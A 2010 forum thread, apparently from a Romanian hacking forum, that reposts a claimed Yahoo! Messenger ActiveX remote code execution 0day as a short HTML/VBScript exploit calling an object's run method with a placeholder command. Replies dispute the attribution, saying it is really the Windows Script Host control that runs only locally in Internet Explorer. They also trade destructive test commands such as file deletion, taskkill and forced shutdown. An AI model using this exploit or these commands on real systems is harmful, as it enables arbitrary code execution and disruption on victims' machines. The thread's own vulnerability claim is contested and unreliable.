Cheater Posted July 26, 2010 Report Posted July 26, 2010 ##################################{In The Name Of Allah The Mercifull}###################### # Title : Yahoo! messenger (V 10.0.0.525-us)beta (yt.dll) 0day suffer from ActiveX Remote Code Execution # Tested : Windows xp (sp3) ## Author : R3d-D3v!L <X[at]hotmail.co.jp> ## # Credits to : XP10_HACKER ((XP10.ME-xp10.com)) ## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D ## ## all member at XP10.ME ## ######################################################## infected bath : Program Files\Yahoo!\Companion\Installs\cpn0\yt.dllreason of infected : Function c ( ByVal bstr As String ) As Stringin (C) in IYTHelpeEXPLO!T: <html> </font></b></p> <p> <object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object> <script language='vbscript'> arg1="TYPE YOUR EXEcUT!ON CODE" target.run arg1 </script></p> sursa: Yahoo! messenger (v10.0.0.525-us beta) yt.dll ActiveX Remote Code Execution 0day Quote
Nytro Posted July 26, 2010 Report Posted July 26, 2010 Merge doar de pe Internet Explorer, dar merge Quote
AlStar Posted July 26, 2010 Report Posted July 26, 2010 Eu am incercat pentru 10.0.0.1270arg1="del test.tst"siarg1="del test.tst;"Si niciun rezultat... E gresit ce-am scris eu sau clar nu e compatibil cu ultima versiune de Y!M? Quote
ROFL Posted July 26, 2010 Report Posted July 26, 2010 Ce legatura are asta cu Yahoo! Messenger? E copiat de aici si e un "exploit" pentru IE(iti cere permisiunea daca vrei sa-l executi sau nu): http://www.exploit-db.com/exploits/11457/O sa fie sters in curand si de pe exploit-db, deocamdata e neverificat. Quote
Nytro Posted July 26, 2010 Report Posted July 26, 2010 Da, e vorba de C:\Windows\system32\wshom.ocx, runtime de la Windows Script Host.AlStar: "taskkill /IM winamp.exe /F"De pe Internet Explorer, dai Allow la Blocked Content. Quote
ROFL Posted July 26, 2010 Report Posted July 26, 2010 Pai si tot nu inteleg ce legatura are cu Y! M, tu daca vrei sa testezi asta, salvezi ca exploit.html si il deschizi cu IE. Unde folosesti Y! M? Quote
AlStar Posted July 26, 2010 Report Posted July 26, 2010 AlStar: "taskkill /IM winamp.exe /F"De pe Internet Explorer, dai Allow la Blocked Content.He He De unde ai stiut ca am Winampu' pornit?Dar merge numa' taskkill? Oricum e naspa ca tre' sa dai allow, plus ca toti au auzit de Firefox si Opera.. Quote
ROFL Posted July 26, 2010 Report Posted July 26, 2010 He He De unde ai stiut ca am Winampu' pornit?Dar merge numa' taskkill? Oricum e naspa ca tre' sa dai allow, plus ca toti au auzit de Firefox si Opera..Merge orice:cmd /c shutdown -s -t 00+ Merge doar local, daca il uploadezi pe un host nu se intampla nimic.Concluzie: Inutil! Quote
